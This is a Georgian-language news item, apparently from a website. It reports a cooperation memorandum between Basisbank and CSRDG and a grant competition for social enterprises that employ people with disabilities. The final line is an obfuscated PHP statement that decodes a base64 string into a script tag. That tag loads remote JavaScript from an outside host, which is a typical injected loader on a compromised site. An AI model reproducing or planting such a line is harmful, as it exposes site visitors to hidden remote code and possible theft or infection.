celsiusi
ავერსი საქკაბელი

"ბაზისბანკსა" და საქართველოს სტრატეგიული კვლევებისა და განვითარების ცენტრს (CSRDG) შორის გაფორმებულია ურთიერთთანამშრომლობის მემორანდუმი, რომელიც საქართველოში მოქმედი სოციალური საწარმოების გაძლიერებასა და ბაზისბანკის მხრიდან სოციალური მეწარმეობის კონცეფციის განვითარების ხელშეწყობას ითვალისწინებს როგორც ფინანსური, ასევე ტექნიკური მხარდაჭერის მექანიზმებით.

სოციალური მეწარმეობის განვითარების პროგრამას CSRDG 2009 წლიდან ახორციელებს. ბაზისბანკისა და CSRDG-ს შორის ურთიერთთანამშრომლობის მემორანდუმის ერთ-ერთ პრიორიტეტულ კომპონენტს შეზღუდული შესაძლებლობების და განსაკუთრებული საჭიროებების მქონე პირების შრომითი ინტეგრაციის სოციალური საწარმოს მხარდაჭერა და გაძლიერება წარმოადგენს.

საქართველოს სტრატეგიული კვლევებისა და განვითარების ცენტრი, ბაზისბანკთან თანამშრომლობით,  მოქმედი სოციალური საწარმოების გაძლიერების საგრანტო კონკურსს აცხადებს, რომელიც მიზნად ისახავს შშმ და განსაკუთრებული საჭიროებების მქონე პირების ეკონომიკურ და სოციალურ ინტეგრაციას საზოგადოებაში, მათი დასაქმებისა და განათლებაზე ხელმისაწვდომობის ზრდით.

საგრანტო კონკურსის შესახებ დეტალური ინფორმაცია მოცემულია CSRDG -ის ვებგვერდზე https://www.segeorgia.org/ge/news/basisbankcsrdggrant

 (რ)

317
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");